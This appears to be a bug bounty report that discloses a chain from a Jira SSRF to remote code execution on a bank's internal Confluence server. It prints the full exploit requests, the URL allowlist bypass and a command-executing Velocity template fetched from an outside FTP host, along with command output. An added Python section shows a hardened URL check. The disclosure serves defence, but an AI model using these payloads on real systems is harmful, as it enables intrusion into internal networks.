CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.975 High (Percentile: 100.0%)
This report describes a combination of two separate vulnerabilities in two separate services. This chain of vulnerabilities allows an unauthenticated attacker to run arbitrary code on a server inside the company's internal network.
Jira at https://jira.tochka.com is vulnerable to SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451.
Anyone on the internet can make it issue arbitrary HTTPS requests and read responses.
Moreover:
This allows an attacker to reach the internal instance of Confluence at https://confluence.bank24.int.
Confluence at https://confluence.bank24.int uses a vulnerable version of the Widget Connector plugin. This vulnerability leads to an RCE (CVE-2019-3396).
There is an advisory by Atlassian. Also, there is a publicly known exploit for this vulnerability.
https://jira.tochka.com:[email protected]/
This bug could be used to send requests to an internal Confluence server https://confluence.bank24.int like so:
Request example:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]
Response snippet:
throw 1; < don't be evil' >{"https://jira.tochka.com:[email protected]":{"rc":200,"headers":{},"body":"<!DOCTYPE html>\n<html>\n<head>\n <title>Рабочий стол - Confluence<\/title>\n \n \n\n \n \n \n \n\n \n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=EDGE,chrome=IE7\">\n<meta charset=\"UTF-8\">\n<meta id=\"confluence-context-path\" name=\"confluence-context-path\" content=\"\">\n<meta id=\"confluence-base-url\" name=\"confluence-base-url\" content=\"https://confluence.bank24.int\">\n\n<meta id=\"atlassian-token\" name=\"atlassian-token\" content=\"f999fa99a5663c168e72b407eecdeec3695c70d0\">\n\n\n<script type=\"text/javascript\">\n var contextPath = '';\n<\/script>\n\n \n\n <meta name=\"confluence-request-time\" content=\"1571051898165\">\n \n \n \n <meta name=\"ajs-discovered-plugin-features\" content=\"$discoveredList\">\n <meta name=\"ajs-use-keyboard-shortcuts\" content=\"true\">\n <meta name=\"ajs-keyboardshortcut-hash\" content=\"97637bc20dfc7a1f15684630bc99897\">\n <meta id=\"team-calendars-has-jira-link\" content=\"true\">\n <meta name=\"ajs-team-calendars-display-time-format\" content=\"displayTimeFormat24\">\n <meta id=\"team-calendars-display-week-number\" content=\"false\">\n <meta
...
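The request above gets past the makeRequest allowlist because the trusted Jira hostname sits in the userinfo part of the URL (the text before the @), while the HTTP client actually connects to the host after the @. The following is an added example, not code from this report or from Atlassian, that contrasts a string-prefix allowlist check with one that validates the parsed destination; the hosts jira.example.com and confluence.internal.example are constructed placeholders.

```python
# Added example, not code from the report or from Atlassian: why an allowlist check
# on the raw URL string can be bypassed, and how to check the parsed destination.
from urllib.parse import urlsplit

# Constructed allowlist: the only host a server-side fetcher should be allowed to reach.
ALLOWED_HOSTS = {"jira.example.com"}


def naive_is_allowed(url: str) -> bool:
    """Bypassable: tests the text right after the scheme, which may be userinfo, not the host."""
    after_scheme = url.split("://", 1)[-1]
    return any(after_scheme.startswith(host) for host in ALLOWED_HOSTS)


def hardened_is_allowed(url: str) -> bool:
    """Validates the destination the HTTP client will actually connect to."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False                      # no http, ftp, file, gopher, ...
    if "@" in parts.netloc:
        return False                      # userinfo is never needed for a gadget fetch
    if parts.hostname is None or parts.hostname.lower() not in ALLOWED_HOSTS:
        return False                      # exact match, so jira.example.com.evil.example fails
    try:
        port = parts.port
    except ValueError:
        return False                      # malformed port string
    return port in (None, 443)            # default port only


def classify(url: str) -> dict:
    """Side-by-side verdicts for one candidate URL."""
    return {"naive": naive_is_allowed(url), "hardened": hardened_is_allowed(url)}


if __name__ == "__main__":
    # Constructed inputs: the trusted name placed in the userinfo part, a look-alike
    # domain, and a legitimate same-host request.
    for candidate in (
        "https://jira.example.com:@confluence.internal.example/",
        "https://jira.example.com.evil.example/",
        "https://jira.example.com/rest/api/2/serverInfo",
    ):
        print(candidate, classify(candidate))
```

The hardened check deliberately compares the hostname the parser extracts, not the string the user supplied, and rejects any URL carrying userinfo at all; that is the property the vulnerable whitelist logic lacked.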
It looks like you have restrictions in place for outgoing HTTP and HTTPS requests, but not for FTP.
I set up an FTP server to serve a malicious template at ftp://68.183.67.159/qwe2.txt
File contents:
#set ($exp="exp")
#set ($a=$exp.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($command))
#set ($input=$exp.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $exp.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($exp.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
3232
It takes the command parameter, executes the corresponding command and returns the result.
To trigger this chain of vulnerabilities, execute the following request:
POST /plugins/servlet/gadgets/makeRequest HTTP/1.1
Host: jira.tochka.com
User-Agent: curl/7.61.1
Accept: */*
X-Atlassian-Token: no-check
Content-Length: 322
Content-Type: application/x-www-form-urlencoded
Connection: close
url=https://jira.tochka.com:[email protected]/rest/tinymce/1/macro/preview&httpMethod=POST&headers=content-type%3Dapplication/json&postData={"contentId":"1","macro":{"body":"","params":{"url":"https://www.youtube.com/watch?v=y6sOtXOvchY","_template":"ftp://68.183.67.159/qwe2.txt","command":"id"},"name":"widget"}}
It makes Jira send a macro preview request to Confluence. Confluence then fetches the template from the FTP server and executes the id command.
Response snippet:
...
<div>\n uid=502(confluence) gid=502(confluence) groups=502(confluence) context=unconfined_u:system_r:initrc_t:s0\n\r\n3232\r\n\n <\/div>\n
...
You may change the command parameter to your liking.
Fixed in: Widget Connector plugin version 3.1.4 or higher.